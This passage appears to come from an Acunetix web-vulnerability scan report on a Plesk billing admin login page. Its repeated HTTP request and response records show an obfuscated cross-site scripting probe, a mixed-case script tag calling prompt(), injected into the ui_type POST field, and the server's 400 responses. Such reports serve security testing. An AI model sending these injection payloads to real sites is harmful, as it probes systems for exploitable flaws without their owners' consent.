Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(913730)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...jMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=icw7s5pdqfo8vija34r3mn3ijdllhfojnpz&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28913730%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:26 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(994883)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 930
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=q6doj6qcwss13qtaxjubgcaradllhfongy9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28994883%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit39
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:26 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:26 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(934323)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 940
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...wx1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=oiuo1znyttbbn4tii5j9fludllhfogmac&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28934323%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(932474)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 927
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...cysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=wn0u0cu6wa17iw518ownqndidllhfofoug&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28932474%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit40
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(976992)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 994
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...H9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=bjhuaj5t7lv9jg0oq9u6qvaxxdllhfog5bs&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976992%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:25 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:25 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(951349)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...jMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=a2e382443rlratzlfj4buc9z7dllhfd4smq&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28951349%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit41
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:22 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(951721)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 994
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...H9kROLFDUySD8qEjXJGOQqpOPGfiXPLDkulZXRLWnlkyaiaqMdne7va2bsw39r77dF2UBg9xgc0tp1qEFoPvQitDck2O4UYqd1WpqhoxHM9D7WcTr9tGGMDmYmVKlxxX1Or%2fOm7VWjGEkG%2blIFltptKghnsKA0uF2s5gTBp%2fmsLsQN7fXvb7P97Dl5qeHIMEOQnPguCPoNWgq%2folcB36Pl6VUAIBx4misJm4i8WNUpZ-99d1d8f5815393576c6a33a706548c9f486cb796&request_id=vtk10sf6g7c9jhtzd1f55jfm0dllhfhvbpa&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28951721%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(923595)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...yKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=c9dps92q7ckk9m0d3ylk7219odllhffp7io&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28923595%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit42
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:22 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(954797)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 930
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=vqde3mrhcmcu72zf2edh2jk25dllhfhnnso&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28954797%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(942783)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...jMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=c220q1jnalmn2xo8hd0quy5psdllhfhhfw6&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28942783%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit43
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(927942)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 942
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...1UnjKJEnoJcUmBnqDJT3kGGHZKN87oOQ%2fDN%2fW7Upbk%2bHu%2f%2biOsxLMuyIl61ns5apu9F2udqYvsOFFFM03aWNgVLS79MPc7Dsw23eBS1iZ1qXfu0QbvmxY%2bbzhqYTLaUEXlHu8gkItgbGsoHkjtIzJr%2f2UtQwevb2%2b7%2b33161OKFUxABP%2bNOU3iL0EryLUIl6T28Zlu5kNIJL%2bZUFbuav9q5Fq4%3d-836aeca61f0d9cf54d9e8554b1dab0fee5bfdbb5&request_id=xegaz4qhrmgkat9654pnylmtjdllhfhwcbo&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28927942%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(928076)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 930
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...6hYFZiQmN31yr4wxSBI9%2brtG3E68SUooijXU7zsbOaHfqm2m%2bXtDusL2GYdTg4doh1HJddwfnpNbTWXZwatiWBRKFuG6DafsY2Tqs06Dm%2fe%2fF38IBahN6bG37nEf75sWNmWjNmYy60EDKamMZzfTLTRlKh5I6CGYtfm0lXvHXt7dN%2fr9zdUrDiyAPXn3i2UYTV9AoRbYSJb2b2OToQUoLDuZYhY3UX%2fPuHPY%3d-36f5da45dea4db35181527932feb21b4522af8ff&request_id=kb6o8o1jup1xvat023q48obwudllhfk3hi9&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28928076%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit44
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(989619)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...yKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=woyy3afcety9cfp4ht2gzmqjidllhflglly&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28989619%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(906090)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 938
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...jMn4nVEeNwlg8slsjozNUqVLCnikcgZyXK97OfRO7TT2f7%2ffrkXMuwng9bpdq3fSwVZPQerwMTE4r2bkrxBDb7WXaLq5n7dexl%2fPwZ%2fFTeGC1CZ1qbfuSpV2zOZ6N1kBEnEsZlvayu4ww%2fTJJg%2bkoUgayWdPfewgqeH1728f%2fd4ZOarZR9MzLT55jBLYyrQTN2JTAd2BNXjMTwjLH5hhlu4G%2f35cHgw%3d%3d-795d9b2610f8b020c630b61ea686337501b7027b&request_id=sv0q3uhszc35j7nquwacpsc1mdllhfjxlzl&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28906090%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit45
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:24 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:24 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(928788)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 936
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...yKyeGnVDHJCG3bLKsYgMTmbubJpJ1EmppRDgh3uGHYX1NjfaEIaTy89xXOPT7Z%2b6qeLrS%2fuFkpvem3MNJ6ggTbbg0CiyON2mqblvNZunTqYj5clnGOvKhtbbFzzvEHb%2buaHbdFKZJp1oVUpqH1LNjMsZ7CUriR1kJqN%2fLOXRCle3952%2bf8O1YNRN0lBBfisg2UHV2VQy81H1PTuYL3lrrR2yquZq2rf6C%2fWORs5-4eb0fde9b4cce264a406fc960f41760b3e6e8367&request_id=dzdzpqpoxjuq68gfyrbs9if1edllhfhwgk4&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28928788%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(965449)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 927
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...cysWxWdt42ZaSzMaCZzsXMm2IzQZKSeRx3bfSMb%2b3BxHjM63z9K%2fnKxpOhy7i4l%2buUl5uxrnnDRmPsmoLzPbotCIidZtMP1Aia3jOo9q2b%2b4eE53orVp0L3vL2V06G5hKkQpCkm6tBU5qo0lmRndWVnMd5I7UCyG%2f95K0MDr29sm%2f9%2bxBmXEjWMUUX3e0ZKHqzBa8uKklvjuYVeSF1J6EcRCVbFx%2bgvUdR22-793b72608099d2555312d5b39efab3a788f206a0&request_id=eo8l93kulathzgb1cv79uukndllhfhyh6c&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28965449%29%3c%2fScRiPt%3e
Response
Acunetix Website Audit46
HTTP/1.1 400 Bad Request
Connection: close
Expires: Fri, 28 Oct 2011 17:35:23 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 17:35:23 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(909822)</ScRiPt>
Request
POST /plesk-billing/admin/index.php/default?ctr=login&sso_api_path=/ui HTTP/1.1
Content-Length: 891
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=04958fffed3e98300fb593eae513c904; locale=en-US; psaContext=home
Host: psa v10.3.1_build1013110726.09 os_RedHat el6:8443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*

(line truncated) ...tVZmb6ie0eEaJxrsSCfpfZHXGXESIrkMcg1BnaGIjGlGSRYE22ct63vvavudy0v1fX3cHcDboNf13VDvCo1n9UU78tkXoqZHTOQRCF2O1jqGCyt3Tp3uPQvxt%2fCIEodWlnb%2bnmHttWrG3edJbAp2pJapBkdIqMIb26oKS1IqiCxKP7reIIC3h6Pw%2f2%2f%2fXSoxCsnLzx%2bxJ7G8Fah5MT3COVESdfjD%2f2JDf0%3d-3e2d8237554de288723d4ae69cc01c78981623f6&request_id=iadl6yl2ga89192xs60901aajdllhffkzv0&response_url=https%3a%2f%2fpsa v10.3.1_build1013110726.09 os_RedHat el6%3a8443%2frelay&sp_id=sv6vh6em8wotku9a1nu5i3p3qdllhf52yrc&ui_type=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28909822%29%3c%2fScRiPt%3e
Response
HTTP/1.1 400 Bad Request
Expires: Fri, 28 Oct 2011 15:12:16 GMT
Cache-Control: max-age=2592000
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 28 Sep 2011 15:12:16 GMT
Server: sw-cp-server
Content-Length: 150
/plesk-billing/admin/index.php/default
Details
URL encoded POST input ui_type was set to '"()&%1<ScRiPt >prompt(929382)</ScRiPt>
Request
